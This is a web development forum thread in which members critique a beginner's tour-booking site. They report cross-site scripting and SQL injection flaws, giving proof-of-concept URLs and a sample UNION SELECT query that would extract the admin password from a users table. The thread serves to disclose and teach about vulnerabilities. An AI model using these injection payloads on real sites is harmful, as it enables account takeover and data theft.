First major Site..
Moderator: General Moderators
First major Site..
[Posted under old name]
Last edited by Zoxive on Wed Sep 09, 2009 11:08 pm, edited 2 times in total.
You are susceptible to XSS:
http://www.batechcentral.com/NTS_am/2/p ... /script%3E
http://www.batechcentral.com/NTS_am/2/p ... /script%3E
Whats this?jshpro2 wrote:You are susceptible to XSS:
http://www.batechcentral.com/NTS_am/2/p ... /script%3E
Never herd of it.. to bad i can't fix... due date was the 1st..
-NSF
Login session? i dont have cookies..jshpro2 wrote:cross site scripting.
It means I can log in as the admin if I get you to load a specially constructed URL, if you were logged in as the admin it could cause javascript to send me your login cookie.
And i Wikied it, but didn't get much from it other then cross site scrippting, and it was mainly used to crack sites..
-NSF
- John Cartwright
- Site Admin
- Posts: 11470
- Joined: Tue Dec 23, 2003 2:10 am
- Location: Toronto
- Contact:
Ok, well beyond that.. its my first site...... ; (Jcart wrote:As in I could capture your session cookie, and potentionally gain access/permission to the admin section as long as an admin logged in while I had this attack setup.. could also steal anyones account that logged in as well.
And i just started php when i first joined.
So anything about the site? i was very happy with it.. till now.. : /
-NSF
- Invalid CSSNonStopableForce wrote:So anything about the site? i was very happy with it.. till now.. : /-NSF
- Help/Sitemap/Adv search hard to read, could be in the main nav bar, not spaced well/consistently
- At least four different fonts on the page (including images), could be fewer
- Have to click About Us to learn anything about NTS. Will destroy your google ratings. At least have some intro text on the main page
- Very nice use of a consistent color scheme (blue/brown/green), although I prefer less colors.
- Cross-site scripting vulnerable
Overall, not bad, but not great.
-
benamaster
- Forum Newbie
- Posts: 4
- Joined: Fri Feb 03, 2006 7:52 am
I have to say I like the features on the http://www.batechcentral.com/ntspm quite a bit better compared to the http://www.batechcentral.com/nts_am/2/
The http://www.batechcentral.com/ntspm site has much better features as you can select a date via a calendar and they list sites in the city and the tours that go to those sites.
The http://www.batechcentral.com/ntspm site has much better features as you can select a date via a calendar and they list sites in the city and the tours that go to those sites.
If you notice i didnt realize you couldn't use // to comment out, thats why it doesn't validate... and its after the 1st so i can't fix.Roja wrote: - Invalid CSS
Ok, you think that because you made it?benamaster wrote:I have to say I like the features on the http://www.batechcentral.com/ntspm quite a bit better compared to the http://www.batechcentral.com/nts_am/2/
The http://www.batechcentral.com/ntspm site has much better features as you can select a date via a calendar and they list sites in the city and the tours that go to those sites.
But what does everyone else think?
-NSF
Are we the judges on this competition and we don't even know it?
The "enemy"'s site:
- when I page to a new month on the calender it scrolls me to the top of the page, perhaps use of anchors to scroll the page back to where I was would be appropriate, or a simple ajax / iframe solution to avoid that issue all together
- The elements on the bottom of the tour pages are not arranged in a logical way, I have tabs to read reviews, see a calender, an area to rate the tour, etc.. all cluttered into one area.
- links in upper right are in a non-standard place, and do not stand out.
+ fluid layout, I can resize / change font size
- sql injection on http://www.batechcentral.com/ntspm/Prod ... ProductID= ????
As for your site, it has sql injection here:
http://www.batechcentral.com/NTS_am/2/tours.php?tour=
(this gives me the ability to run any query I want, with very few limitations on what I can run)
Regarding the sql injection, just to prevent confusion you are adding slashes or escaping the string but this does you no good because you're running the input like so:
Since $id has no single quotes around it in your query I can insert things
Proof of concept -
http://www.batechcentral.com/NTS_am/2/t ... r%205=5%20;
I'm just selecting but I'm doing it through the SQL injection vulnerability
The "enemy"'s site:
- when I page to a new month on the calender it scrolls me to the top of the page, perhaps use of anchors to scroll the page back to where I was would be appropriate, or a simple ajax / iframe solution to avoid that issue all together
- The elements on the bottom of the tour pages are not arranged in a logical way, I have tabs to read reviews, see a calender, an area to rate the tour, etc.. all cluttered into one area.
- links in upper right are in a non-standard place, and do not stand out.
+ fluid layout, I can resize / change font size
- sql injection on http://www.batechcentral.com/ntspm/Prod ... ProductID= ????
As for your site, it has sql injection here:
http://www.batechcentral.com/NTS_am/2/tours.php?tour=
(this gives me the ability to run any query I want, with very few limitations on what I can run)
Regarding the sql injection, just to prevent confusion you are adding slashes or escaping the string but this does you no good because you're running the input like so:
Code: Select all
select `whatever` from `table` where `id`= $idProof of concept -
http://www.batechcentral.com/NTS_am/2/t ... r%205=5%20;
I'm just selecting but I'm doing it through the SQL injection vulnerability
mm i just tryed messing with that, and everytime it would bring up tour id 28, with 5=5 or anything=anythingjshpro2 wrote: As for your site, it has sql injection here:
http://www.batechcentral.com/NTS_am/2/tours.php?tour=
(this gives me the ability to run any query I want, with very few limitations on what I can run)
Regarding the sql injection, just to prevent confusion you are adding slashes or escaping the string but this does you no good because you're running the input like so:
Since $id has no single quotes around it in your query I can insert thingsCode: Select all
select `whatever` from `table` where `id`= $id
Proof of concept -
http://www.batechcentral.com/NTS_am/2/t ... r%205=5%20;
I'm just selecting but I'm doing it through the SQL injection vulnerability
There isn't much they could do with that, but yes i know its bad, and i'll make account of all these mess ups for furture websites..
-NSF
-
benamaster
- Forum Newbie
- Posts: 4
- Joined: Fri Feb 03, 2006 7:52 am
We should all make a vote!
Thought with this being a PHP site and my site being in ASP.NET 2.0 I am pretty sure who would win out. I have done PHP before and I do like it but its alot easier I think to manage a project in Visual Studio 2005.
For my personal site I use PHP, does anyone have suggestions of a Visual Studio like program that would be better than Dreamweaver 8?
Thought with this being a PHP site and my site being in ASP.NET 2.0 I am pretty sure who would win out. I have done PHP before and I do like it but its alot easier I think to manage a project in Visual Studio 2005.
For my personal site I use PHP, does anyone have suggestions of a Visual Studio like program that would be better than Dreamweaver 8?
- feyd
- Neighborhood Spidermoddy
- Posts: 31559
- Joined: Mon Mar 29, 2004 3:24 pm
- Location: Bothell, Washington, USA
My vote: you're all off the island for failing to face your fears with big brother and your fellow geeks watching on.
No ASP vs PHP war.
Check out vs.PHP (I think that's the name) .. or PHP Designer.. Happily, most decent code editors are better than Dreamweaver. If you have any further, off topic things to ask, like editor questions, look around the forums. There is a VERY large editors thread.
No ASP vs PHP war.
Check out vs.PHP (I think that's the name) .. or PHP Designer.. Happily, most decent code editors are better than Dreamweaver. If you have any further, off topic things to ask, like editor questions, look around the forums. There is a VERY large editors thread.
Wrong, here's another example:NonStopableForce wrote:There isn't much they could do with that
http://www.batechcentral.com/NTS_am/2/t ... d%20=%2033
I imagine the query I just made looks like
select `field`, `field` from `some_table` where `id` = 0 or id = 33 order by `field`
Now what if I knew the schema of your tables and ran the following query
select `field`, `field` from `some_table` where `id` = 0 or id =33 union all select 'dummy_data', `password` from `users` where `username`='admin' ; -- order by `field`
Obviously that's not a valid query on your system but if I was motivated enough I could select data from any of your tables with this exploit, who knows what other exploits I could find if I had the time / will to seek them all out. (ie., maybe you have an sql injection vulnerability somewhere else where I could delete from tables)